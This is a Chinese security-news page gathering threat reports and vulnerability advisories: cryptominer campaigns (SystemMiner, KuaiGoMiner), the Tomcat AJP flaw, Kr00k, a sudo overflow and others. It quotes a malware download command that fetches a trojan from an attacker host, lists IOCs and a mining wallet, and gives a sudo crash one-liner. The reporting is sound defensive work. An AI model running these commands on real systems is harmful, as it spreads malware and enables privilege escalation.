标签: 漏洞事件

警惕 Linux 挖矿木马 SystemMiner 通过 SSH 爆破入侵攻击

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/yNiGdnLDbKE9lm_iZVOxPA   一、概述 近日某企业Linux服务器出现卡慢,CPU占用高等现象,向腾讯安全威胁情报中心求助。工程师征得客户同意对该企业网络运行情况进行安全审计。通过对故障服务器进行安全检查,发现该服务器遭遇SSH弱密码爆破入侵。入侵者植入定时任务实现持久化,定时任务下载执行病毒母体INT, INT内置了多个bash命令,会进一步下载执行Linux挖矿木马SystemMiner。 此外入侵者还会利用运维工具ansible、knife等执行命令批量攻击感染内网其他机器,会尝试下载脚本卸载腾讯云云镜、阿里云安骑士等安防产品以实现自保护,入侵者还会修改hosts文件屏蔽其他挖矿网址以独占挖矿资源。 二、病毒分析 1.    入侵阶段 腾讯安全运维专家通过查看失陷主机相关日志,发现入侵者尝试数短时间内爆破SSH接近三千次,爆破入侵成功后会创建执行定时任务kpccv.sh。 2.    持久化 通过创建定时任务实现持久化,定时任务为sh脚本,脚本内容经过base64编码加密。定时任务执行周期为59分钟以内的一个随机数值。 Kpccv.sh经过bash64加密,其主要功能是下载病毒母体INT执行。为了避免下载地址失效,内置了多个下载地址。tencentxjy5kpccv.拼接tor2web.io,tor2web.in等得到完整的下载链接。 Kpccv.sh解密后的内容如下: 3.    病毒母体INT分析 INT为ELF格式可执行文件,运行后创建一子进程执行,内置了多个bash命令,经base64编码加密,每个bash脚本命令都对应着完整的功能模块,下文依次分析每个bash命令实现的具体功能。 3.1 本地持久化 该bash模块主要功能是实现本地持久化,创建定时任务0kpccv,定时任务执行周期为59分钟以内的一个随机数值。定时任务执行kpccv.sh脚本,写入脚本的内容经过了base64编码,其主要功能是下载执行病毒母体INT。 Base64解码后的bash脚本: 3.2 内网渗透&自保护 利用运维工具ansible、knife、salt执行命令实现对内网机器批量感染,执行命令经过base64编码,解码后其功能为下载执行病毒母体INT 下载脚本尝试卸载腾讯云云镜、阿里云安骑士等安全防护产品以实现自保护。 下载可执行文件bot,trc模块执行,目前下载链接已失效。 3.3  清理其他挖矿木马&屏蔽矿池网址 该模块主要功能是清理机器上的挖矿木马,并且修改hosts文件,将常见的挖矿网址systemten.org、pm.cpuminerpool.com等映射到ip地址0.0.0.0,以实现屏蔽其他挖矿网址实现独占系统资源。 3.4 下载执行挖矿木马 执行最核心的功能,下载执行挖矿木马。下载链接通过拼接而成,tencentxjy5kpccv.拼接tor2web.io等,挖矿模块cpu为ELF格式可执行文件。 执行门罗币挖矿,矿池配置如下: 三、安全建议 腾讯安全专家建议各企业对Linux服务器做以下加固处理: 1.采用高强度的密码,避免使用弱口令,并建议定期更换密码。建议服务器密码使用高强度无规律密码,并强制要求每个服务器使用不同密码管理; 2.排查相关Linux服务器是否有kpccv等相关定时任务,有则结束相关进程,清理相关木马文件; 3.在终端/服务器部署专业安全防护软件,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务平台。 4.推荐企业部署腾讯T-Sec高级威胁检测系统(腾讯御界)及时捕捉黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html) IOCs: MD5: 177e3be14adcc6630122f9ee1133b5d3 e5f8c201b1256b617974f9c1a517d662 b72557f4b94d500c0cd7612b17befb70 域名: tencentxjy5kpccv.t.tor2web.io tencentxjy5kpccv.t.tor2web.io tencentxjy5kpccv.t.tor2web.to tencentxjy5kpccv.t.tor2web.in tencentxjy5kpccv.t.onion.to tencentxjy5kpccv.t.onion.in.net tencentxjy5kpccv.t.civiclink.network tencentxjy5kpccv.t.onion.nz tencentxjy5kpccv.t.onion.pet tencentxjy5kpccv.t.onion.ws tencentxjy5kpccv.t.onion.ly 矿池: 136.243.90.99:8080

Wi-Fi 漏洞 Kr00k 曝光:全球数十亿台设备受影响

由赛普拉斯半导体(Cypress Semiconductor)和博通(Broadcom)制造的Wi-Fi芯片存在严重安全漏洞,让全球数十亿台设备非常容易受到黑客的攻击,能让攻击者解密他周围空中传输的敏感数据。 在今天开幕的RSA安全会议中,这项安全漏洞被公开。而对于Apple用户而言,该问题已在去年10月下旬发布的iOS 13.2和macOS 10.15.1更新中得到了解决。 安全公司ESET在RSA会议上详细介绍了这个漏洞,黑客可以利用称为Kr00k的漏洞来中断和解密WiFi网络流量。该漏洞存在于赛普拉斯和博通的Wi-Fi芯片中,而这是拥有全球市场份额较高的两大品牌,从笔记本电脑到智能手机、从AP到物联网设备中都有广泛使用。 其中亚马逊的Echo和Kindle、苹果的iPhone和iPad、谷歌的Pixel、三星的Galaxy系列、树莓派、小米、华硕、华为等品牌产品中都有使用。保守估计全球有十亿台设备受到该漏洞影响。 黑客利用该漏洞成功入侵之后,能够截取和分析设备发送的无线网络数据包。Ars Technica表示: Kr00k利用了无线设备从无线接入点断开关联时出现的漏洞。如果终端用户设备或AP热点遭到攻击,它将把所有未发送的数据帧放入发送缓冲区,然后再无线发送它们。易受攻击的设备不是使用先前协商并在正常连接期间使用的会话密钥来加密此数据,而是使用由全零组成的密钥,此举使解密变得不太可能。 一件好事是,Kr00k错误仅影响使用WPA2-个人或WPA2-Enterprise安全协议和AES-CCMP加密的WiFi连接。 这意味着,如果使用Broadcom或Cypress WiFi芯片组设备,则可以防止黑客使用最新的WiFi验证协议WPA3进行攻击。 据发布有关该漏洞的详细信息的ESET Research称,该漏洞已与潜在受影响的各方一起公开给了Broadcom和Cypress。目前,大多数主要制造商的设备补丁已发布。关于该漏洞的信息,可以访问https://www.welivesecurity.com/wp-content/uploads/2020/02/ESET_Kr00k.pdf   (稿源:cnBeta,封面源自网络。)

关于 Apache Tomcat 存在文件包含漏洞的安全公告

国家信息安全漏洞共享平台(CNVD)近日发布了一份关于 Apache Tomcat 存在文件包含漏洞的安全公告,安全公告编号:CNTA-2020-0004,具体信息如下: 2020 年 1 月 6 日,国家信息安全漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的 Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)。攻击者利用该漏洞,可在未授权的情况下远程读取特定目录下的任意文件。目前,漏洞细节尚未公开,厂商已发布新版本完成漏洞修复。 一、漏洞情况分析 Tomcat 是 Apache 软件基金会 Jakarta 项目中的一个核心项目,作为目前比较流行的 Web 应用服务器,深受 Java 爱好者的喜爱,并得到了部分软件开发商的认可。Tomcat 服务器是一个免费的开放源代码的 Web 应用服务器,被普遍使用在轻量级 Web 应用服务的构架中。 2020 年 1 月 6 日,国家信息安全漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的 Apache Tomcat 文件包含漏洞。Tomcat AJP 协议由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器 webapp 下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步实现远程代码的执行。 CNVD 对该漏洞的综合评级为“高危”。 二、漏洞影响范围 漏洞影响的产品版本包括: Tomcat 6 Tomcat 7 Tomcat 8 Tomcat 9 CNVD 平台对 Apache Tomcat AJP 协议在我国境内的分布情况进行统计,结果显示我国境内的 IP 数量约为 55.5 万,通过技术检测发现我国境内共有 43197 台服务器受此漏洞影响,影响比例约为 7.8%。 三、漏洞处置建议 目前,Apache 官方已发布 9.0.31、8.5.51 及 7.0.100 版本对此漏洞进行修复,CNVD 建议用户尽快升级新版本或采取临时缓解措施: 1.   如未使用 Tomcat AJP 协议: 如未使用 Tomcat AJP 协议,可以直接将 Tomcat 升级到 9.0.31、8.5.51 或 7.0.100 版本进行漏洞修复。 如无法立即进行版本更新、或者是更老版本的用户,建议直接关闭 AJPConnector,或将其监听地址改为仅监听本机 localhost。 具体操作: (1)编辑 <CATALINA_BASE>/conf/server.xml,找到如下行(<CATALINA_BASE> 为 Tomcat 的工作目录): <Connector port="8009"protocol="AJP/1.3" redirectPort="8443" /> (2)将此行注释掉(也可删掉该行): <!--<Connectorport="8009" protocol="AJP/1.3"redirectPort="8443" />--> (3)保存后需重新启动,规则方可生效。 2.   如果使用了 Tomcat AJP 协议: 建议将 Tomcat 立即升级到 9.0.31、8.5.51 或 7.0.100 版本进行修复,同时为 AJP Connector 配置 secret 来设置 AJP 协议的认证凭证。例如(注意必须将 YOUR_TOMCAT_AJP_SECRET 更改为一个安全性高、无法被轻易猜解的值): <Connector port="8009"protocol="AJP/1.3" redirectPort="8443"address="YOUR_TOMCAT_IP_ADDRESS" secret="YOUR_TOMCAT_AJP_SECRET"/> 如无法立即进行版本更新、或者是更老版本的用户,建议为 AJPConnector 配置 requiredSecret 来设置 AJP 协议认证凭证。例如(注意必须将 YOUR_TOMCAT_AJP_SECRET 更改为一个安全性高、无法被轻易猜解的值): <Connector port="8009"protocol="AJP/1.3" redirectPort="8443"address="YOUR_TOMCAT_IP_ADDRESS"require 附:参考链接 https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html https://tomcat.apache.org/tomcat-8.0-doc/config/ajp.html https://stackoverflow.com/questions/21757694/what-is-ajp-protocol-used-for   (稿源:开源中国,封面源自网络。)

“快Go矿工”新增 MS SQL爆破攻击,上万台电脑中招

感谢腾讯御见威胁情报中心来稿! 原文:https://s.tencent.com/research/report/888.html   一、背景 腾讯安全威胁情报中心检测到“快Go矿工”更新,该团伙本次更新利用MSSQL弱口令爆破攻击的方式进行传播。“快Go矿工”由御见威胁情报中心于2019年10月发现,最初仅利用“永恒之蓝”漏洞进行攻击传播,因其使用的C2域名中包含“kuai-go”,腾讯安全威胁情报中心将其命名为“快Go矿工”(KuaiGoMiner)。 “快Go矿工”最新变种将挖矿程序伪装成系统进程WinInit.exe,截止目前已挖矿获得门罗币47个,市值人民币2万余元。同时,病毒在攻陷机器上植入的gh0st远控木马,具有搜集信息、上传下载文件、键盘记录、执行任意程序等多种功能,被攻陷的电脑还会面临机密信息泄露的风险。 据腾讯威胁情报中心统计数据,“快Go矿工”(KuaiGoMiner)变种已攻击上万台电脑,受害最严重地区为江苏、山东和广东。 腾讯安全提醒企业用户检查SQL服务器的SA用户口令,切勿配置弱口令登录,快Go矿工入侵后还会使用永恒之蓝系列攻击工具横向传播,植入远控木马,对政企机构信息系统安全构成严重威胁。 二、漏洞攻击 “快Go矿工” (KuaiGoMiner) 变种在攻陷的系统下载攻击模块,释放NSA武器中的“双脉冲星”、“永恒浪漫”、“永恒之蓝”漏洞攻击工具,释放到C:\Windows\Fonts\usa\目录下。 释放成功后go.vbs首先启动,然后执行go.bat,在go.bat中利用服务管理工具NSSM(释放文件名为svchost.exe)将攻击脚本cmd.bat安装为服务HTTPServers反复执行。 cmd.bat请求http[:]//scan.jiancai008.com:88/2020/local.asp和 http[:]//sex.zhzy999.net/ip2.php获取本机的IP地址, 请求http[:]//scan.jiancai008.com:88/2020/random.asp获取随机生成的C段和D段为“0.0“的IP地址,然后利用 “永恒之蓝”漏洞攻击工具针对本机同网段IP和随机生成的IP进行扫描攻击。 三、MSSQL爆破 近期KuaiGoMiner还利用MSSQL弱口令爆破进行攻击,爆破成功后首先通过shell代码写入vget.vbs作为下载者程序,然后利用vget.vbs下载PE木马sql.exe,下载命令如下: C:/Program Files (x86)/Microsoft SQL Server/MSSQL.1/MSSQL/Binn/sqlservr.exe C:/Windows/System32/CScript.exe C:/ProgramData/vget.vbs  http[:]//sex.zhzy999.net/sql.exe C:/ProgramData/taskger.exe sql.exe为gh0st远控木马,该木马控制电脑后,继续下载挖矿木马http[:]//go.jiancai008.com:88/2020/1.rar,然后解压释放文件到目录C:\Windows\Fonts\usa\。 将门罗币挖矿程序WinInit.exe安装为服务”WinIniter”,使用矿池:xmr-eu1.nanopool.org:14433,钱包:4Ao7AGamzR4cs4E4uK5tcFF9TR6ouXMY4LAi64jHGYQZRWYCupQ7coBGzE7BtcHBWvQFreNEMg1s9iws7ejgwZtB1gQ55Uq进行挖矿。 目前该钱包已挖矿获取门罗币47.169个,折合人民币28000余元。 四、安全建议 1.服务器使用安全的密码策略,特别是IPC$、MSSQL、RDP服务的账号密码,切勿使用弱口令; 2.根据微软公告及时修复以下Windows系统高危漏洞; MS17-010永恒之蓝漏洞 XP、WindowsServer2003、win8等系统访问: http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598 Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx 建议企业用户使用腾讯T-Sec终端安全管理系统(腾讯御点,下载链接:https://s.tencent.com/product/yd/index.html),个人用户使用腾讯电脑管家进行漏洞扫描和修复。 3.企业用户可部署腾讯T-Sec高级威胁检测系统(御界),发现、追踪黑客攻击线索。腾讯T-Sec高级威胁检测系统是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html) IOCs IP 64.111.27.3 Domain sex.zhzy999.net scan.jiancai008.com s.jiancai008.com go.jiancai008.com URL http[:]//sex.zhzy999.net/sql.exe http[:]//go.jiancai008.com:88/2020/1.rar http[:]//go.jiancai008.com:88/2020/2.rar http[:]//go.jiancai008.com:88/2020/3.rar MD5 1a5ba25af9d21f36cf8b3df7d2f55348 b87af17c857b208fcd801cb724046781 09bf2fef86d96ec9a1c3be0a020ae498 57bd72d6dc95ff57b5321a62b9f7cde2 70d3908f1b9909b7d23ee265e77dd1f9 1f1bc2ec00db3551d7700c05c87956df 05c57ccd23ab3f623bf1adda755af226

卡巴斯基:Windows 10 升级漏洞并非由公司杀毒工具引起

据外媒报道,微软在发现导致安装失败或安装成功出现某些功能崩溃的问题后取消了Windows 10的安全更新。据了解,这个KB4524244原本是为了解决在卡巴斯基救援盘(Rescue Disk)中发现的一个安全漏洞而推出的。该安全漏洞则是在去年4月被公开的。 尽管卡巴斯基自己在8月份解决了这个问题,但为了保护运行旧版本软件的用户微软还是决定开发额外的补丁。 卡巴斯基表示,升级所导致的问题跟他们的软件无关,因为在KB4524244安装在Windows 10上之后他们已经进行了彻底的检查从而确保跟他们的救援盘工具之间不存在兼容性问题。 “微软还没有就更新问题联系卡巴斯基。经过详细的内部分析,我们的专家得出结论,卡巴斯基的产品不是引发这个问题的原因,”卡巴斯基说道。 另外,卡巴斯基表示,如果更新安装正确且没有遇到任何问题,那么用户就不需方采取任何行动。 微软表示,此次更新不会再发布,但针对已经发现的漏洞他们正在修复中。   (稿源:cnBeta,封面源自网络。)

IOTA 加密货币在钱包漏洞被利用后关闭整个网络

IOTA 不是基于区块链而是基于有向非循环图这一数学概念的加密货币,它诞生于比特币最为火热的 2017 年。上周,在得知黑客正利用官方钱包应用漏洞窃取用户资金之后,管理 IOTA 的基金会关闭了整个加密货币网络。 攻击发生在 2 月 12 日,IOTA 基金会在收到报告 25 分钟内关闭了用于批准交易的最后一个节点 Coordinator,阻止黑客窃取用户资金,但事实上也关闭了整个网络。攻击者被认为针对了 10 个高价值的用户,利用官方钱包应用 Trinity 的漏洞窃取资金。据非官方消息称,有大约价值 160 万美元的 IOTA 币被窃取。IOTA 团队在周日发布了 1.4 版本,修复了被利用的漏洞。目前网络仍然下线,开发者正在敲定补救计划。   (稿源:solidot,封面源自网络。)

安全人员发现以色列政府 DNS 服务器存在 Open SSH 安全漏洞

安全研究人员Eitan Caspi最近检查了gov.il子域的HTTPS站点是否有安全问题,结果他在以色列政府DNS服务器上发现了一个开放的Open SSH访问。 使用Qualys开发的在线SSL检查器,Eitan Caspi分析了服务器上的SSL配置,最终在端口22上收到来自其中一个被检查IP的答复。 SSH使用端口22,该服务允许管理员连接到Linux服务器,Caspi说开放访问允许他尝试登录。 Eitan Caspi在当天将这一发现发送给以色列国家认证中心,十分钟后,Eitan Caspi还设法联系了以色列政府信息技术部门资深人士,并将详细情况告知了相关问题。根据Eitan Caspi透露,几个小时后,端口被关闭,通道被封锁。 但是,经过进一步分析,他发现该服务器使用了一个OpenSSH旧版本,该版本以包含多个漏洞而闻名。该服务器运行的是OpenSSH 7.4p1,该版本于2016年12月发布,因此已经存在三年多了。从那时起,OpenSSH发行了多个版本和针对各种安全问题的一系列安全修复程序,现在服务器中可能没有安装这些更新版本和修复程序。   (稿源:cnBeta,封面源自网络。)

Facebook 修复了 WhatsApp 中的漏洞,阻止黑客访问用户本地文件系统

Facebook 解决了 WhatsApp 中的一个严重漏洞(CVE-2019-18426),黑客可能利用该漏洞读取macOS 和Windows 操作系统的用户文件。 根据Facebook发布的安全公告,与iPhone端WhatsApp搭配使用时,WhatsApp Desktop中的一个漏洞允许跨站点脚本编写和本地文件读取。用户单击特制文字消息中的链接预览将会触发此漏洞。   Weizman在WhatsApp的内容安全策略(CSP)中发现了一个漏洞,使得黑客可以对进行跨站点脚本攻击(XSS),后续还发现黑客还可以利用此漏洞获得Windows和macOS 上WhatsApp应用文件的读取权限。 专家写道: “如果您运行的应用是易受攻击的旧版本,该漏洞将有可能对您造成不良影响。” “关于如何使用fetch()API,例如,可以从本地操作系统读取文件,例如本例中的C:\ Windows \ System32 \ drivers \ etc \ hosts文件的内容,” 该漏洞可能使黑客在消息中注入恶意代码和链接,这些消息和链接对于受害者是完全透明的。   消息来源:SecurityAffairs, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Sudo 漏洞允许非特权 Linux 和 macOS 用户以 root 身份运行命令

苹果的安全专家Joe Vennix发现了一个漏洞(CVE-2019-18634),它允许非特权Linux和macOS用户以root身份运行命令。 此漏洞仅能在特殊配置下利用。 仅当“pwfeedback”选项已在sudo配置文件中启用时才能利用该漏洞。root的 pwfeedback 选项允许在用户输入密码时提供视觉反馈。 专家指出,即使用户不在用户文件中也可以触发此漏洞。 “无需获得 root 权限即可触发此漏洞,只需启用 pwfeedback 即可。” sudo 开发人员 Todd C. Miller 写道。 “在输入密码时,可以通过管道大量输入sudo进行复现。例如:” $ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id Password: Segmentation fault 造成此漏洞的原因有两个: 从终端设备以外的其他设备读取时一般不会忽略pwfeedback选项。由于缺少终端,因此行擦除字符的版本始终为初始值0。 如果存在写错误,擦除星号行的代码将无法正确重置缓冲区位置,但是会重置剩余的缓冲区长度。这将导致getln()函数写到缓冲区以外。” 如果启用了该选项,可以在用户配置文件中将“Defaults pwfeedback” 改为 “Defaults !pwfeedback” 。 sudo 维护人员发布了 root 的 1.8.31版本。 “虽然 sudo 的1.8.26到1.8.30版本中也有逻辑错误,但是由于1.8.26之后的版本对EOF处理进行了改动,所以无法利用漏洞。”Miller解释道。 在2019年10月,Vennix 发现了一个Sudo绕过问题,即使“sudo用户配置”不允许进行root访问,恶意用户或恶意程序仍然可以在目标Linux系统上以root用户身份执行任意命令。   消息来源:SecurityAffairs, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Facebook 漏洞或泄露主页管理员信息

Facebook于上周解决了一个安全漏洞,该漏洞暴露了主页管理员的帐户,并且被黑客利用于向若干个名人的主页发动在野攻击。 主页管理员的帐户是匿名的,除非页面所有者选择公开,但漏洞将会泄露管理员的帐户。 Facebook的“查看编辑历史”允许主页管理员查看所有相关的活动,包括修改过帖子的用户的用户名。黑客可能根据这个漏洞泄露修改者以及管理员的账号,并严重影响隐私。 在安全研究员警告后,Facebook迅速解决了该问题。 黑客攻击的页面列表包括 Donald Trump总统,街头艺术家Banksy,俄罗斯总统Vladimir Putin,前美国国务卿Hillary Clinton,加拿大总理Justin Trudeau,黑客组织匿名人士,气候活动家Greta Thunberg,以及说唱歌手Snoop Dogg等。 2018年2月,安全研究员Mohamed Baset 在Facebook上发现了一个类似漏洞。 Baset解释说,该漏洞属于“逻辑错误”:他之前曾在一个界面点赞了一篇帖子,之后他收到来自Facebook的邀请邮件,邀请链接就指向了这篇帖子所在的页面。研究人员分析了社交网络发送的电子邮件的源代码,发现其中包括页面管理员的姓名和其他信息。   消息来源:SecurityAffairs, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接